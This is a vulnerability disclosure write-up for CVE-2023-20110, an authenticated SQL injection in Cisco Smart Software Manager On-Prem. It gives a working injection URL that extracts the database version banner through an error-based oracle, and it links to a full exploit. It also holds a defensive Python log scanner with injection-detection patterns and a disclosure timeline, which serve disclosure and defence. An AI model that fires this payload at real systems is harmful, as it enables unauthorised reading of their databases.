
CVE: CVE-2023-20110
Title: Authenticated SQL Injection in 'filter_by' parameter
CVSS score: 6.5 (Medium)
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Product: Cisco Smart Software Manager On-Prem
Affected versions: <= Release 8-202212
Researcher: Jakub Brzozowski (redfr0g)

A vulnerability in the web-based management interface of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system.

To present the full impact of this vulnerability, a Proof of Concept exploit was created. The exploit exfiltrates the result of the version() function executed against the PostgreSQL DBMS running on the backend. It uses a division-by-zero error as a boolean oracle: the injected CASE expression divides by zero only when the guessed prefix of the banner is wrong, so the presence or absence of the error reveals the DBMS banner one character at a time.

Payload used:

https://<SSM-IP>:8443/backend/notifications/search_account_notifications.json?filter_by=message_type))%20LIKE%20%27%25%27+OR+1+%3d+1/+(SELECT+CASE+WHEN+(select+version()+LIKE+'P%25')+THEN+0+ELSE+1+END)--%20&filter_val=a&offset=0&limit=10
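A defender-side example, added here and not part of the original exploit or of Cisco's product: a small log scanner that decodes the filter_by parameter of requests to the vulnerable endpoint and flags values carrying the markers of this injection (unbalanced parentheses that close the original expression, a CASE WHEN oracle, version(), or a trailing comment terminator). The access-log format and the two sample lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter named in the advisory.
VULN_PATH = "/backend/notifications/search_account_notifications.json"
VULN_PARAM = "filter_by"

# Tokens that a legitimate column name in filter_by never contains.
SUSPICIOUS = re.compile(
    r"--|/\*|\bCASE\s+WHEN\b|\bSELECT\b|\bversion\s*\(\s*\)|\bOR\s+1\s*=\s*1\b",
    re.IGNORECASE,
)

# Request line inside a common-log-format entry (assumed format).
REQ_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def suspicious_filter_by(log_line):
    """Return the decoded filter_by value when the request targets the
    vulnerable endpoint and the value looks like an injection, else None."""
    m = REQ_RE.search(log_line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if parts.path != VULN_PATH:
        return None
    # parse_qs percent-decodes and turns '+' into spaces, as the backend would.
    for value in parse_qs(parts.query, keep_blank_values=True).get(VULN_PARAM, []):
        unbalanced = value.count(")") != value.count("(")
        if unbalanced or SUSPICIOUS.search(value):
            return value
    return None


def scan(lines):
    """Return (line_index, decoded_value) for every suspicious entry."""
    return [(i, v) for i, v in ((i, suspicious_filter_by(l)) for i, l in enumerate(lines))
            if v is not None]


# Constructed sample log: one benign lookup, then the advisory's payload.
SAMPLE_LOG = [
    '10.0.0.5 - alice [17/Jul/2023:10:00:01 +0000] "GET /backend/notifications/'
    'search_account_notifications.json?filter_by=message_type&filter_val=a&offset=0&limit=10 HTTP/1.1" 200 512',
    '10.0.0.9 - bob [17/Jul/2023:10:00:02 +0000] "GET /backend/notifications/'
    'search_account_notifications.json?filter_by=message_type))%20LIKE%20%27%25%27+OR+1+%3d+1/+'
    '(SELECT+CASE+WHEN+(select+version()+LIKE+\'P%25\')+THEN+0+ELSE+1+END)--%20'
    '&filter_val=a&offset=0&limit=10 HTTP/1.1" 500 0',
]
```

Running scan(SAMPLE_LOG) reports only the second line; the same pattern can be fed from a SIEM query on the endpoint path, with the HTTP 500 responses the oracle relies on as a corroborating signal.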

You can find the full exploit here: https://github.com/redfr0g/CVE-2023-20110

Disclosure timeline:

  • 23-01-2023 - vulnerability reported to Cisco PSIRT
  • 23-01-2023 - first response from Cisco
  • 07-02-2023 - successful reproduction of the vulnerability by Cisco and identification of the root cause of the bug
  • 10-05-2023 - CVE-2023-20110 is assigned to the vulnerability
  • 18-05-2023 - security advisory is published by Cisco
  • 19-05-2023 - Cisco approves public disclosure of the vulnerability
  • 17-07-2023 - vulnerability writeup published on brzozowski.io